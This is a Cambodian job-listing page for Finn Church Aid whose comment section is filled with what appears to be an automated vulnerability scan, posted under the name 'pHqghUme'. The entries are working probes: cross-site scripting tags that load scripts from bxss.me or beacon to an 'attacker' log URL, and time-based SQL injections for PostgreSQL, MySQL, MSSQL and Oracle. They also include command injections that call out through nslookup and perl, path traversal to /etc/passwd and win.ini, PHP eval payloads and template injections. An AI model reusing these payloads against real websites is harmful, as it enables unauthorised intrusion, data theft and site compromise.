ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

អង្គការជំនួយព្រះវិហារហ្វាំងឡង់
Finn Church Aid (official name in Finnish "Kirkon Ulkomaanapu sr") is a faith-based organisation founded by the Evangelical Lutheran Church of Finland on 25 September 1947. The foundation has been recorded in the Finnish Register of Foundations on 15 October 1992 (business identity code 0998454-4). FCA is the largest Finnish development cooperation organisation and the second largest provider of humanitarian aid.

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 18

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 24 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 07:09:29


  1<PjAdYq<


 • pHqghUme

  2021-05-06 07:09:23


  1<img sRc='http://attacker-9621/log.php?


 • pHqghUme

  2021-05-06 07:09:16


  1<LdQiD7 x=9060>


 • pHqghUme

  2021-05-06 07:09:10


  1<ifRAme sRc=9401.com></IfRamE>


 • pHqghUme

  2021-05-06 07:09:03


  1<WW3Q2B>M0WGI[!+!]</WW3Q2B>


 • pHqghUme

  2021-05-06 07:08:56


  1JXxNa <ScRiPt >uY6j(9579)</ScRiPt>


 • pHqghUme

  2021-05-06 07:08:49


  1<% contenteditable onresize=uY6j(9292)>


 • pHqghUme

  2021-05-06 07:08:42


  1}body{acu:Expre/**/SSion(uY6j(9989))}


 • pHqghUme

  2021-05-06 07:08:35


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:08:26


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:08:18


  1<input autofocus onfocus=uY6j(9242)>


 • pHqghUme

  2021-05-06 07:08:07


  1&lt;ScRiPt&gt;uY6j(9815)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:08:00


  1\u003CScRiPt\uY6j(9877)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:07:53


  %31%3C%53%63%52%69%50%74%20%3E%75%59%36%6A%289720%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:07:45


  1<img/src=">" onerror=alert(9560)>


 • pHqghUme

  2021-05-06 07:07:38


  1<img src=xyz OnErRor=uY6j(9870)>


 • pHqghUme

  2021-05-06 07:07:32


  1<img src=//xss.bxss.me/t/dot.gif onload=uY6j(9332)>


 • pHqghUme

  2021-05-06 07:07:25


  1<body onload=uY6j(9908)>


 • pHqghUme

  2021-05-06 07:07:19


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9610'>


 • pHqghUme

  2021-05-06 07:07:12


  1<isindex type=image src=1 onerror=uY6j(9210)>


 • pHqghUme

  2021-05-06 07:06:59


  1<ScRiPt >uY6j(9249)</ScRiPt>


 • pHqghUme

  2021-05-06 07:06:51


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9191></ScRiPt>


 • pHqghUme

  2021-05-06 07:06:43


  1<ScRiPt >uY6j(9465)</ScRiPt>


 • pHqghUme

  2021-05-06 07:06:34


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%75%59%36%6A%28%39%39%38%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:06:26


  1<script>uY6j(9424)</script>


 • pHqghUme

  2021-05-06 07:06:19


  1<W85ZGY>JSUEX[!+!]</W85ZGY>


 • pHqghUme

  2021-05-06 07:06:12


  1<ScRiPt >uY6j(9977)</ScRiPt>


 • pHqghUme

  2021-05-06 07:06:05


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:05:58


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:05:52


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:05:45


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:05:38


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:05:30


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:05:22


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:05:10


  acux7831%C0%BEz1%C0%BCz2a%90bcxuca7831


 • pHqghUme

  2021-05-06 07:05:03


  acu3403%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3403


 • pHqghUme

  2021-05-06 07:04:56


  19078024


 • pHqghUme

  2021-05-06 07:04:46


  '"()&%<acx><ScRiPt >uY6j(9357)</ScRiPt>


 • pHqghUme

  2021-05-06 07:04:39


  1'"()&%<acx><ScRiPt >uY6j(9996)</ScRiPt>


 • pHqghUme<jRrg8k<

  2021-05-06 07:04:31


  1


 • pHqghUme<img sRc='http://attacker-9435/log.php?

  2021-05-06 07:04:20


  1


 • pHqghUme<TMxGMP x=9747>

  2021-05-06 07:04:09


  1


 • pHqghUme<ifRAme sRc=9199.com></IfRamE>

  2021-05-06 07:04:02


  1


 • pHqghUme<WIYIKG>ITQQX[!+!]</WIYIKG>

  2021-05-06 07:03:54


  1


 • pHqghUmeI4sKz <ScRiPt >uY6j(9308)</ScRiPt>

  2021-05-06 07:03:45


  1


 • pHqghUme<% contenteditable onresize=uY6j(9132)>

  2021-05-06 07:03:37


  1


 • pHqghUme}body{acu:Expre/**/SSion(uY6j(9168))}

  2021-05-06 07:03:30


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:03:23


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:03:16


  1


 • pHqghUme<input autofocus onfocus=uY6j(9290)>

  2021-05-06 07:03:09


  1


 • pHqghUme&lt;ScRiPt&gt;uY6j(9233)&lt;/sCripT&gt;

  2021-05-06 07:02:56


  1


 • pHqghUme\u003CScRiPt\uY6j(9041)\u003C/sCripT\u003E

  2021-05-06 07:02:49


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%75%59%36%6A%289567%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:02:42


  1


 • pHqghUme<img/src=">" onerror=alert(9440)>

  2021-05-06 07:02:35


  1


 • pHqghUme<img src=xyz OnErRor=uY6j(9522)>

  2021-05-06 07:02:28


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=uY6j(9384)>

  2021-05-06 07:02:21


  1


 • pHqghUme<body onload=uY6j(9688)>

  2021-05-06 07:02:14


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9000'>

  2021-05-06 07:02:07


  1


 • pHqghUme<isindex type=image src=1 onerror=uY6j(9472)>

  2021-05-06 07:01:58


  1


 • pHqghUme<ScRiPt >uY6j(9783)</ScRiPt>

  2021-05-06 07:01:49


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9308></ScRiPt>

  2021-05-06 07:01:43


  1


 • pHqghUme<ScRiPt >uY6j(9012)</ScRiPt>

  2021-05-06 07:01:35


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%75%59%36%6A%28%39%37%39%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:01:28


  1


 • pHqghUme<script>uY6j(9390)</script>

  2021-05-06 07:01:21


  1


 • pHqghUme<WL3TGE>JCZKE[!+!]</WL3TGE>

  2021-05-06 07:01:15


  1


 • pHqghUme<ScRiPt >uY6j(9135)</ScRiPt>

  2021-05-06 07:01:07


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:01:00


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:00:51


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:00:38


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:00:30


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:00:23


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:00:14


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:00:04


  1


 • pHqghUme

  2021-05-06 07:00:01


  @@xSg1e


 • acux9307%C0%BEz1%C0%BCz2a%90bcxuca9307

  2021-05-06 06:59:51


  1


 • pHqghUme

  2021-05-06 06:59:49


  1'"


 • pHqghUme

  2021-05-06 06:59:45


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • acu2711%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2711

  2021-05-06 06:59:38


  1


 • pHqghUme9165418

  2021-05-06 06:59:29


  1


 • '"()&%<acx><ScRiPt >uY6j(9881)</ScRiPt>

  2021-05-06 06:59:23


  1


 • pHqghUme'"()&%<acx><ScRiPt >uY6j(9763)</ScRiPt>

  2021-05-06 06:59:16


  1


 • pHqghUme

  2021-05-06 06:59:13


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 06:59:10


  1


 • pHqghUme

  2021-05-06 06:59:03


  1


 • pHqghUme

  2021-05-06 06:58:55


  1


 • pHqghUme

  2021-05-06 06:58:48


  1


 • pHqghUme

  2021-05-06 06:58:45


  BCy8UUsb')) OR 990=(SELECT 990 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 06:58:41


  1


 • pHqghUme

  2021-05-06 06:58:34


  1


 • pHqghUme

  2021-05-06 06:58:26


  <!--


 • pHqghUme

  2021-05-06 06:58:24


  '"


 • <!--

  2021-05-06 06:58:23


  1


 • pHqghUme

  2021-05-06 06:58:20


  xkGCv4Wx') OR 312=(SELECT 312 FROM PG_SLEEP(15))--


 • '"

  2021-05-06 06:58:20


  1


 • pHqghUme

  2021-05-06 06:58:20


  '+'A'.concat(70-3).concat(22*4).concat(98).concat(81).concat(116).concat(84)+(require'socket' Socket.gethostbyname('hitob'+'ozykzwrn7b142.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 06:58:19


  1


 • pHqghUme

  2021-05-06 06:58:19


  "+"A".concat(70-3).concat(22*4).concat(112).concat(72).concat(107).concat(81)+(require"socket" Socket.gethostbyname("hitst"+"scjfibar1d208.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 06:58:19


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 06:58:17


  1


 • '+'A'.concat(70-3).concat(22*4).concat(120).concat(73).concat(111).concat(84)+(require'socket' Socket.gethostbyname('hitpx'+'avyxzomdc728f.bxss.me.')[3].to_s)+'

  2021-05-06 06:58:17


  1


 • pHqghUme

  2021-05-06 06:58:17


  HttP://bxss.me/t/xss.html?%00


 • "+"A".concat(70-3).concat(22*4).concat(109).concat(71).concat(120).concat(71)+(require"socket" Socket.gethostbyname("hitmr"+"xpwujghs92020.bxss.me.")[3].to_s)+"

  2021-05-06 06:58:16


  1


 • pHqghUme

  2021-05-06 06:58:16


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 06:58:16


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 06:58:16


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 06:58:15


  1


 • pHqghUme

  2021-05-06 06:58:15


  1


 • pHqghUme

  2021-05-06 06:58:14


  1


 • /xfs.bxss.me

  2021-05-06 06:58:14


  1


 • pHqghUme

  2021-05-06 06:58:13


  1


 • pHqghUme

  2021-05-06 06:58:13


  1


 • pHqghUme

  2021-05-06 06:58:12


  1


 • pHqghUme

  2021-05-06 06:58:12


  1


 • pHqghUme

  2021-05-06 06:58:11


  1


 • pHqghUme

  2021-05-06 06:58:11


  1


 • pHqghUme

  2021-05-06 06:58:11


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 06:58:10


  1


 • pHqghUme

  2021-05-06 06:58:10


  1


 • pHqghUme

  2021-05-06 06:58:09


  1


 • pHqghUme

  2021-05-06 06:58:09


  1


 • pHqghUme

  2021-05-06 06:58:08


  1


 • pHqghUme

  2021-05-06 06:58:07


  1


 • pHqghUme

  2021-05-06 06:58:01


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 06:58:00


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 06:57:59


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 06:57:56


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 06:57:55


  StII3Q5Q' OR 345=(SELECT 345 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 06:57:54


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 06:57:52


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • '.print(md5(31337)).'

  2021-05-06 06:57:50


  1


 • ${@print(md5(31337))}\

  2021-05-06 06:57:48


  1


 • ${@print(md5(31337))}

  2021-05-06 06:57:46


  1


 • ";print(md5(31337));$a="

  2021-05-06 06:57:43


  1


 • ';print(md5(31337));$a='

  2021-05-06 06:57:41


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 06:57:38


  1


 • pHqghUme

  2021-05-06 06:57:33


  1


 • pHqghUme

  2021-05-06 06:57:29


  1


 • pHqghUme

  2021-05-06 06:57:25


  1


 • pHqghUme

  2021-05-06 06:57:22


  1


 • pHqghUme

  2021-05-06 06:57:20


  `(nslookup hitfkrydcjkdd3aa28.bxss.me||perl -e "gethostbyname('hitfkrydcjkdd3aa28.bxss.me')")`


 • pHqghUme

  2021-05-06 06:57:19


  1


 • pHqghUme

  2021-05-06 06:57:17


  |(nslookup hithgnfjuyzfu25f5b.bxss.me||perl -e "gethostbyname('hithgnfjuyzfu25f5b.bxss.me')")


 • pHqghUme

  2021-05-06 06:57:16


  1


 • pHqghUme

  2021-05-06 06:57:13


  1


 • pHqghUme

  2021-05-06 06:57:10


  $(nslookup hitnjxsctvknxdba37.bxss.me||perl -e "gethostbyname('hitnjxsctvknxdba37.bxss.me')")


 • pHqghUme

  2021-05-06 06:57:10


  1


 • pHqghUme

  2021-05-06 06:57:09


  (nslookup hitlbtfdqpryae833c.bxss.me||perl -e "gethostbyname('hitlbtfdqpryae833c.bxss.me')")


 • pHqghUme

  2021-05-06 06:57:09


  1


 • pHqghUme

  2021-05-06 06:57:08


  |echo vypjyf$()\ svngat\nz^xyu||a #' |echo vypjyf$()\ svngat\nz^xyu||a #|" |echo vypjyf$()\ svngat\nz^xyu||a #


 • pHqghUme

  2021-05-06 06:57:08


  1


 • pHqghUme

  2021-05-06 06:57:07


  &echo adrmrh$()\ lhjrld\nz^xyu||a #' &echo adrmrh$()\ lhjrld\nz^xyu||a #|" &echo adrmrh$()\ lhjrld\nz^xyu||a #


 • pHqghUme

  2021-05-06 06:57:07


  1


 • pHqghUme

  2021-05-06 06:57:06


  echo ykegle$()\ ouutfa\nz^xyu||a #' &echo ykegle$()\ ouutfa\nz^xyu||a #|" &echo ykegle$()\ ouutfa\nz^xyu||a #


 • pHqghUme

  2021-05-06 06:57:06


  1


 • pHqghUme

  2021-05-06 06:57:06


  -1)) OR 908=(SELECT 908 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 06:57:05


  '"()


 • `(nslookup hitgxorjvapxc0d0f6.bxss.me||perl -e "gethostbyname('hitgxorjvapxc0d0f6.bxss.me')")`

  2021-05-06 06:57:03


  1


 • pHqghUme

  2021-05-06 06:57:03


  ".gethostbyname(lc("hitnv"."pgatglpn2fb6c.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(80).chr(113).chr(85)."


 • pHqghUme

  2021-05-06 06:57:02


  1&n916198=v973409


 • |(nslookup hitgvcbwgovii9d1b6.bxss.me||perl -e "gethostbyname('hitgvcbwgovii9d1b6.bxss.me')")

  2021-05-06 06:57:02


  1


 • pHqghUme

  2021-05-06 06:57:02


  '.gethostbyname(lc('hitxi'.'edrxynbf6d744.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(77).chr(115).chr(87).'


 • '.gethostbyname(lc('hitpq'.'otkhgczwd1e75.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(68).chr(98).chr(68).'

  2021-05-06 06:57:01


  1


 • '"()

  2021-05-06 06:57:01


  1


 • ".gethostbyname(lc("hitgs"."mwqpeegwec96a.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(71).chr(117).chr(69)."

  2021-05-06 06:57:01


  1


 • pHqghUme

  2021-05-06 06:57:00


  1


 • pHqghUme

  2021-05-06 06:57:00


  1


 • $(nslookup hitvxpugwdzgud474d.bxss.me||perl -e "gethostbyname('hitvxpugwdzgud474d.bxss.me')")

  2021-05-06 06:56:59


  1


 • pHqghUme

  2021-05-06 06:56:59


  1


 • pHqghUme

  2021-05-06 06:56:58


  1


 • pHqghUme

  2021-05-06 06:56:58


  bxss.me


 • (nslookup hitgfdtsdzdxd595e7.bxss.me||perl -e "gethostbyname('hitgfdtsdzdxd595e7.bxss.me')")

  2021-05-06 06:56:58


  1


 • pHqghUme

  2021-05-06 06:56:58


  1


 • |echo bxvnuv$()\ oqppyb\nz^xyu||a #' |echo bxvnuv$()\ oqppyb\nz^xyu||a #|" |echo bxvnuv$()\ oqppyb\nz^xyu||a #

  2021-05-06 06:56:57


  1


 • pHqghUme

  2021-05-06 06:56:57


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme&n979516=v939638

  2021-05-06 06:56:57


  1


 • echo wcaxbw$()\ gvtbrz\nz^xyu||a #' &echo wcaxbw$()\ gvtbrz\nz^xyu||a #|" &echo wcaxbw$()\ gvtbrz\nz^xyu||a #

  2021-05-06 06:56:56


  1


 • pHqghUme

  2021-05-06 06:56:56


  1some_inexistent_file_with_long_name%00.jpg


 • &echo gmeimn$()\ nmuqwj\nz^xyu||a #' &echo gmeimn$()\ nmuqwj\nz^xyu||a #|" &echo gmeimn$()\ nmuqwj\nz^xyu||a #

  2021-05-06 06:56:56


  1


 • pHqghUme

  2021-05-06 06:56:56


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 06:56:55


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 06:56:55


  1


 • pHqghUme

  2021-05-06 06:56:55


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 06:56:55


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 06:56:54


  1


 • pHqghUme

  2021-05-06 06:56:54


  !(()&&!|*|*|


 • bxss.me

  2021-05-06 06:56:54


  1


 • ^(#$!@#$)(()))******

  2021-05-06 06:56:53


  1


 • pHqghUme

  2021-05-06 06:56:53


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 06:56:53


  1


 • pHqghUme

  2021-05-06 06:56:53


  )


 • pHqghUme

  2021-05-06 06:56:52


  -5) OR 813=(SELECT 813 FROM PG_SLEEP(15))--


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 06:56:52


  1


 • !(()&&!|*|*|

  2021-05-06 06:56:52


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 06:56:52


  1


 • pHqghUme

  2021-05-06 06:56:51


  1


 • pHqghUme

  2021-05-06 06:56:51


  1


 • )

  2021-05-06 06:56:51


  1


 • pHqghUme

  2021-05-06 06:56:51


  1


 • pHqghUme

  2021-05-06 06:56:50


  1


 • pHqghUme

  2021-05-06 06:56:50


  1


 • pHqghUme

  2021-05-06 06:56:50


  1


 • pHqghUme

  2021-05-06 06:56:49


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 06:56:49


  1


 • pHqghUme

  2021-05-06 06:56:49


  1


 • pHqghUme

  2021-05-06 06:56:49


  1


 • pHqghUme

  2021-05-06 06:56:49


  1


 • pHqghUme

  2021-05-06 06:56:48


  1


 • pHqghUme

  2021-05-06 06:56:48


  1


 • pHqghUme

  2021-05-06 06:56:47


  1


 • pHqghUme

  2021-05-06 06:56:47


  1


 • pHqghUme

  2021-05-06 06:56:47


  1


 • pHqghUme

  2021-05-06 06:56:47


  1


 • pHqghUme

  2021-05-06 06:56:47


  1


 • pHqghUme

  2021-05-06 06:56:46


  1


 • pHqghUme

  2021-05-06 06:56:46


  1


 • pHqghUme

  2021-05-06 06:56:46


  1


 • pHqghUme

  2021-05-06 06:56:46


  1


 • pHqghUme

  2021-05-06 06:56:45


  1


 • pHqghUme

  2021-05-06 06:56:45


  1


 • pHqghUme

  2021-05-06 06:56:45


  1


 • pHqghUme

  2021-05-06 06:56:43


  ../1


 • pHqghUme

  2021-05-06 06:56:42


  ../../../../../../../../../../../../../../windows/win.ini


 • Rm9CZmxHR3M=

  2021-05-06 06:56:42


  1


 • pHqghUme

  2021-05-06 06:56:42


  1


 • pHqghUme

  2021-05-06 06:56:41


  1


 • pHqghUme

  2021-05-06 06:56:41


  1


 • pHqghUme

  2021-05-06 06:56:41


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 06:56:41


  1


 • ${9999616+9999937}

  2021-05-06 06:56:40


  1


 • pHqghUme

  2021-05-06 06:56:40


  1


 • pHqghUme

  2021-05-06 06:56:40


  ${9999543+9999632}


 • ../pHqghUme

  2021-05-06 06:56:40


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 06:56:39


  1


 • pHqghUme

  2021-05-06 06:56:39


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 06:56:39


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 06:56:39


  1


 • pHqghUme

  2021-05-06 06:56:38


  1


 • pHqghUme

  2021-05-06 06:56:38


  1


 • pHqghUme

  2021-05-06 06:56:38


  -5 OR 171=(SELECT 171 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 06:56:38


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 06:56:38


  1


 • pHqghUme

  2021-05-06 06:56:38


  1


 • pHqghUme

  2021-05-06 06:56:37


  1


 • pHqghUme

  2021-05-06 06:56:37


  1


 • pHqghUme

  2021-05-06 06:56:37


  1


 • pHqghUme

  2021-05-06 06:56:36


  1


 • pHqghUme

  2021-05-06 06:56:36


  1


 • pHqghUme

  2021-05-06 06:56:36


  1


 • pHqghUme

  2021-05-06 06:56:35


  1


 • pHqghUme

  2021-05-06 06:56:35


  1


 • pHqghUme

  2021-05-06 06:56:35


  1


 • pHqghUme

  2021-05-06 06:56:34


  1


 • pHqghUme

  2021-05-06 06:56:34


  1


 • pHqghUme

  2021-05-06 06:56:34


  1


 • pHqghUme

  2021-05-06 06:56:34


  1


 • pHqghUme

  2021-05-06 06:56:33


  1


 • pHqghUme

  2021-05-06 06:56:32


  1


 • pHqghUme

  2021-05-06 06:56:29


  '+response.write(9694546*9433207)+'


 • pHqghUme

  2021-05-06 06:56:29


  "+response.write(9694546*9433207)+"


 • "+response.write(9172510*9695763)+"

  2021-05-06 06:56:28


  1


 • pHqghUme

  2021-05-06 06:56:28


  response.write(9694546*9433207)


 • pHqghUme

  2021-05-06 06:56:28


  1


 • response.write(9172510*9695763)

  2021-05-06 06:56:27


  1


 • pHqghUme

  2021-05-06 06:56:27


  BV9wtTk4


 • '+response.write(9172510*9695763)+'

  2021-05-06 06:56:27


  1


 • pHqghUme

  2021-05-06 06:56:26


  1


 • 6S00hg5f

  2021-05-06 06:56:26


  1


 • pHqghUme

  2021-05-06 06:56:25


  1


 • pHqghUme

  2021-05-06 06:56:25


  1


 • pHqghUme

  2021-05-06 06:56:25


  1


 • pHqghUme

  2021-05-06 06:56:24


  1


 • pHqghUme

  2021-05-06 06:56:24


  1


 • pHqghUme

  2021-05-06 06:56:23


  1


 • pHqghUme

  2021-05-06 06:56:22


  1


 • pHqghUme

  2021-05-06 06:56:19


  EMsX089A'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 06:55:58


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 06:55:37


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 06:55:17


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 06:54:58


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 06:54:37


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 06:54:16


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 06:53:56


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 06:53:34


  -1" OR 2+380-380-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 06:53:32


  -1' OR 2+100-100-1=0+0+0+1 or 'QUX05ReG'='


 • pHqghUme

  2021-05-06 06:53:31


  -1' OR 2+347-347-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 06:53:30


  -1 OR 2+327-327-1=0+0+0+1


 • pHqghUme

  2021-05-06 06:53:29


  -1 OR 2+941-941-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 06:53:27


  HQAAU6pj


 • pHqghUme

  2021-05-06 06:53:05


  1


 • pHqghUme

  2021-05-06 06:52:42


  1


 • @@hnl8K

  2021-05-06 06:52:21


  1


 • 1'"

  2021-05-06 06:52:17


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 06:52:16


  1


 • sakIQwtl')) OR 987=(SELECT 987 FROM PG_SLEEP(15))--

  2021-05-06 06:51:56


  1


 • AhJHoPDf') OR 13=(SELECT 13 FROM PG_SLEEP(15))--

  2021-05-06 06:51:33


  1


 • ykVZJIYi' OR 249=(SELECT 249 FROM PG_SLEEP(15))--

  2021-05-06 06:51:07


  1


 • oBDQIICz'; waitfor delay '0:0:15' --

  2021-05-06 06:50:42


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 06:50:23


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 06:50:03


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 06:49:40


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 06:49:22


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 06:49:07


  1


 • -1" OR 2+530-530-1=0+0+0+1 --

  2021-05-06 06:48:49


  1


 • -1' OR 2+259-259-1=0+0+0+1 --

  2021-05-06 06:48:48


  1


 • -1' OR 2+752-752-1=0+0+0+1 or 'erS1gOaN'='

  2021-05-06 06:48:48


  1


 • -1 OR 2+324-324-1=0+0+0+1 --

  2021-05-06 06:48:47


  1


 • -1 OR 2+139-139-1=0+0+0+1

  2021-05-06 06:48:47


  1


 • Rx95GsW9

  2021-05-06 06:48:46


  1


 • pHqghUme

  2021-05-06 06:48:26


  1


 • pHqghUme

  2021-05-06 06:48:06


  1


 • pHqghUme

  2021-05-06 06:47:46


  1


 • pHqghUme

  2021-05-06 06:47:43


  1


 • pHqghUme

  2021-05-06 06:47:42


  1


 • pHqghUme

  2021-05-06 06:47:23


  1


 • pHqghUme

  2021-05-06 06:47:05


  1


 • pHqghUme

  2021-05-06 06:46:47


  1


 • pHqghUme

  2021-05-06 06:46:24


  1


 • pHqghUme

  2021-05-06 06:45:58


  1


 • pHqghUme

  2021-05-06 06:45:33


  1


 • pHqghUme

  2021-05-06 06:45:08


  1


 • pHqghUme

  2021-05-06 06:44:39


  1


 • pHqghUme

  2021-05-06 06:44:17


  1


 • pHqghUme

  2021-05-06 06:43:53


  1


 • pHqghUme

  2021-05-06 06:43:52


  1


 • pHqghUme

  2021-05-06 06:43:51


  1


 • pHqghUme

  2021-05-06 06:43:50


  1


 • pHqghUme

  2021-05-06 06:43:49


  1


 • pHqghUme

  2021-05-06 06:43:49


  1


 • pHqghUme

  2021-05-06 06:43:30


  1


 • pHqghUme

  2021-05-06 06:43:10


  1


 • pHqghUme

  2021-05-06 06:42:46


  1


 • pHqghUme

  2021-05-06 06:42:20


  1


 • pHqghUme

  2021-05-06 06:42:19


  1


 • pHqghUme

  2021-05-06 06:42:00


  1


 • pHqghUme

  2021-05-06 06:41:42


  1


 • pHqghUme

  2021-05-06 06:41:25


  1


 • pHqghUme

  2021-05-06 06:41:07


  1


 • pHqghUme

  2021-05-06 06:40:48


  1


 • pHqghUme

  2021-05-06 06:40:32


  1


 • pHqghUme

  2021-05-06 06:40:16


  1


 • pHqghUme

  2021-05-06 06:39:58


  1


 • pHqghUme

  2021-05-06 06:39:41


  1


 • pHqghUme

  2021-05-06 06:39:22


  1


 • pHqghUme

  2021-05-06 06:39:22


  1


 • pHqghUme

  2021-05-06 06:39:21


  1


 • pHqghUme

  2021-05-06 06:39:21


  1


 • pHqghUme

  2021-05-06 06:39:20


  1


 • pHqghUme

  2021-05-06 06:39:20


  1


 • pHqghUme

  2021-05-06 06:39:01


  1


 • pHqghUme

